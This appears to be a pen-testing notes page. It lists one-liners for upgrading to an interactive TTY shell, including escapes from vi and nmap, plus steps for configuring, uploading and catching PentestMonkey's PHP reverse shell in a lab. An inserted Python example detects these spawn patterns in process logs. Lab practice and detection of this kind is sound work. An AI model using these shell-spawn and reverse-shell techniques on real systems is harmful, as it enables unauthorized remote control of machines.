Shells


TTY Shell

Spawning a TTY shell is very common when doing a pen test. Here are some common ways to spawn one.

  • python -c 'import pty; pty.spawn("/bin/sh")'
  • echo os.system('/bin/bash')
  • /bin/sh -i
  • perl -e 'exec "/bin/sh";'
  • perl: exec "/bin/sh";
  • ruby: exec "/bin/sh"
  • {From within vi}  :!bash
  • {From within vi} :set shell=/bin/bash:shell
  • {From nmap} !sh

                                                    Credit: NetSec
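
From the defender's side, the command lines above are distinctive enough to match in process-execution telemetry. The following is an added example, not part of the original post: it scans constructed process records for the spawn patterns listed above. The record format and the field names (user, parent, comm, cmd) are assumptions.

```python
import re
import shlex

# Command-line patterns derived from the spawn commands listed above.
CMDLINE_RULES = {
    "python-pty-spawn": re.compile(r"\bpython[\d.]*\s+-c\s.*\bpty\.spawn\s*\("),
    "perl-exec-shell": re.compile(r"\bperl\s+-e\s.*\bexec\s+[\"']/bin/(?:ba)?sh"),
    "ruby-exec-shell": re.compile(r"\bruby\s+-e\s.*\bexec\s+[\"']/bin/(?:ba)?sh"),
    "interactive-shell": re.compile(r"(?:^|\s)/bin/(?:ba)?sh\s+-i(?:\s|$)"),
}
# Programs from the list whose shell escapes start a shell as a child process.
ESCAPE_PARENTS = {"vi", "vim", "nmap"}
SHELLS = {"sh", "bash"}

# Constructed sample records (assumed key=value format, not real telemetry).
SAMPLE = r'''
user=www-data parent=sh comm=python cmd="python -c 'import pty; pty.spawn(\"/bin/sh\")'"
user=alice parent=bash comm=python3 cmd="python3 manage.py runserver"
user=alice parent=sudo comm=vim cmd="vim /etc/hosts"
user=www-data parent=vim comm=bash cmd="bash"
user=bob parent=sshd comm=bash cmd="-bash"
user=www-data parent=php comm=sh cmd="/bin/sh -i"
user=carol parent=cron comm=perl cmd="perl -e 'print 1'"
'''


def parse_record(line):
    """Parse one 'key=value key="quoted value"' record into a dict."""
    return dict(tok.split("=", 1) for tok in shlex.split(line) if "=" in tok)


def classify(rec):
    """Return the names of all rules that a parsed record triggers."""
    hits = [name for name, rx in CMDLINE_RULES.items() if rx.search(rec.get("cmd", ""))]
    # A shell whose parent is an editor or scanner indicates a shell escape.
    if rec.get("parent") in ESCAPE_PARENTS and rec.get("comm") in SHELLS:
        hits.append("shell-escape-from-" + rec["parent"])
    return hits


def scan(text):
    """Return (record, hits) pairs for records that trigger at least one rule."""
    records = (parse_record(line) for line in text.strip().splitlines())
    pairs = ((rec, classify(rec)) for rec in records)
    return [(rec, hits) for rec, hits in pairs if hits]


if __name__ == "__main__":
    for rec, hits in scan(SAMPLE):
        print(rec["user"], "|", rec["cmd"], "->", ", ".join(hits))
```

The parent/child rule matters because a shell started from within vi or nmap has an unremarkable command line of its own; only the process ancestry gives it away.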

 

 

PHP Reverse Shell

One of my favorite PHP reverse shells that I use is from PentestMonkey.

  • First, download and save the PHP script
  • Next, modify the code to best suit your needs

    $ip = '127.0.0.1';  // CHANGE THIS

    $port = 1234;       // CHANGE THIS

  • Once uploaded, start a listener to capture the shell, as shown when I completed the FristiLeaks 1.3 lab
    [Screenshot: kit13.png]